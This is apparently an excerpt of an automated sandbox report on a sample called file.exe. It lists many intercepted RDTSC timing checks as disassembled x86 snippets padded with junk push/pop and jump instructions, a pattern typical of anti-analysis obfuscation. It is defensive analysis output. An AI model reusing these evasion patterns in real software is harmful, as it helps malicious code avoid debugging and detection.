                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25BCA second address: F25C64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jbe 00007F2AD9523876h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnl 00007F2AD952387Eh 0x00000013 nop 0x00000014 jc 00007F2AD9523879h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 add ebx, 76A0E87Eh 0x00000027 mov di, C4C2h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007F2AD9523878h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov eax, dword ptr [ebp+122D10C9h] 0x00000052 push FFFFFFFFh 0x00000054 push 00000000h 0x00000056 push edi 0x00000057 call 00007F2AD9523878h 0x0000005c pop edi 0x0000005d mov dword ptr [esp+04h], edi 0x00000061 add dword ptr [esp+04h], 00000014h 0x00000069 inc edi 0x0000006a push edi 0x0000006b ret 0x0000006c pop edi 0x0000006d ret 0x0000006e push eax 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F2AD9523881h 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25C64 second address: F25C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AD900F59Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2A283 second address: F2A29F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2AD952387Eh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2B21C second address: F2B222 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C451 second address: F2C457 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2C457 second address: F2C45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2262F second address: F22635 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22787 second address: F2278B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F228F3 second address: F2294C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2AD9523887h 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F2AD952387Ch 0x00000018 mov eax, dword ptr [eax] 0x0000001a jne 00007F2AD9523888h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 pushad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A08 second address: F22A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A0C second address: F22A10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A10 second address: F22A34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov edx, 2D66F8C2h 0x0000000c lea eax, dword ptr [ebp+12493578h] 0x00000012 mov ecx, 593D9E86h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jng 00007F2AD900F596h 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A34 second address: F22A3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2AD9523876h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A3F second address: F22A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a sub edx, 4A5D2F18h 0x00000010 lea eax, dword ptr [ebp+12493534h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F2AD900F598h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 jnp 00007F2AD900F5A7h 0x00000036 nop 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a push edi 0x0000003b pop edi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22A91 second address: F22AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2AD9523884h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AAD second address: F22AB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AB1 second address: F22AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AC0 second address: F22AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AC5 second address: F22ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22ACA second address: F22AD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F22AD0 second address: EFF4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 movzx ecx, ax 0x0000000b call dword ptr [ebp+122D1A6Bh] 0x00000011 jmp 00007F2AD9523888h 0x00000016 je 00007F2AD952388Eh 0x0000001c jc 00007F2AD952387Eh 0x00000022 push eax 0x00000023 pop eax 0x00000024 jp 00007F2AD9523876h 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6102B second address: F61069 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 jne 00007F2AD900F596h 0x0000000b pop edi 0x0000000c jng 00007F2AD900F5ACh 0x00000012 jmp 00007F2AD900F59Bh 0x00000017 jmp 00007F2AD900F59Bh 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jns 00007F2AD900F5A2h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61069 second address: F6106E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61827 second address: F6182D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6182D second address: F61831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F61831 second address: F61835 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F619BE second address: F619C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65935 second address: F6593B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6593B second address: F65941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65941 second address: F6594C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68A82 second address: F68A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68A86 second address: F68A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68614 second address: F6862D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 jnl 00007F2AD952387Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6862D second address: F68631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68768 second address: F68772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2AD9523876h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68772 second address: F6877C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6877C second address: F6878E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Bh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6878E second address: F68794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F68794 second address: F687A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F687A4 second address: F687BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD900F59Bh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F687BC second address: F687C2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6ADBA second address: F6ADBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA18 second address: F6EA32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F2AD9523882h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA32 second address: F6EA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6EA3D second address: F6EA64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523880h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2AD952387Ch 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6E178 second address: F6E184 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED2FFF second address: ED3009 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2AD9523876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F72F75 second address: F72F7F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2AD900F596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F72F7F second address: F72F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F2AD9523876h 0x0000000e js 00007F2AD9523876h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7353B second address: F73574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2AD900F5B3h 0x0000000a jmp 00007F2AD900F59Ch 0x0000000f jmp 00007F2AD900F5A1h 0x00000014 push edx 0x00000015 jl 00007F2AD900F59Eh 0x0000001b push esi 0x0000001c pop esi 0x0000001d jnc 00007F2AD900F596h 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2249A second address: F22504 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2AD952387Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D3203h], esi 0x00000011 mov ebx, dword ptr [ebp+12493573h] 0x00000017 mov dword ptr [ebp+122D3333h], ecx 0x0000001d add eax, ebx 0x0000001f mov dx, B3DCh 0x00000023 or ecx, 64A31199h 0x00000029 push eax 0x0000002a jbe 00007F2AD9523880h 0x00000030 pushad 0x00000031 push edx 0x00000032 pop edx 0x00000033 je 00007F2AD9523876h 0x00000039 popad 0x0000003a mov dword ptr [esp], eax 0x0000003d xor dh, 00000022h 0x00000040 push 00000004h 0x00000042 jmp 00007F2AD9523885h 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F2AD952387Ah 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73881 second address: F73891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F2AD900F596h 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73891 second address: F73897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73897 second address: F738AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F2AD900F59Ah 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F738AD second address: F738C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F738C7 second address: F738E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F2AD900F596h 0x0000000f jc 00007F2AD900F596h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F738E7 second address: F738ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F74431 second address: F74435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77B3F second address: F77B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F2AD9523876h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77B49 second address: F77B5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F2AD900F59Eh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F80892 second address: F8089C instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AD9523876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F521 second address: F7F528 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7FFF5 second address: F80024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2AD9523881h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jo 00007F2AD9523878h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 pop eax 0x00000019 jng 00007F2AD9523876h 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F80592 second address: F805B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2AD900F59Fh 0x00000009 jmp 00007F2AD900F5A2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84695 second address: F8469F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2AD9523876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84AF2 second address: F84AFE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84AFE second address: F84B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B02 second address: F84B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B08 second address: F84B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jng 00007F2AD9523876h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84B1E second address: F84B22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84DEA second address: F84DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84DFF second address: F84E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F2AD900F596h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84E09 second address: F84E0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84E0F second address: F84E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F2AD900F5B5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F84E21 second address: F84E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85161 second address: F85173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F2AD900F59Bh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85173 second address: F851AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F2AD9523888h 0x00000011 push edi 0x00000012 pop edi 0x00000013 jmp 00007F2AD952387Ah 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F851AB second address: F851B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F2AD900F59Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F851B8 second address: F851BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937CB second address: F937DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F2AD900F596h 0x0000000a pushad 0x0000000b popad 0x0000000c jnc 00007F2AD900F596h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937DE second address: F937E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937E4 second address: F937EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F937EA second address: F937F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F919E2 second address: F919E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F919E8 second address: F919ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91DF9 second address: F91E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F920E2 second address: F920E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F920E9 second address: F920F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F920F2 second address: F920F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F920F6 second address: F92107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92107 second address: F9210B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9210B second address: F92132 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2AD900F596h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F2AD900F5A8h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
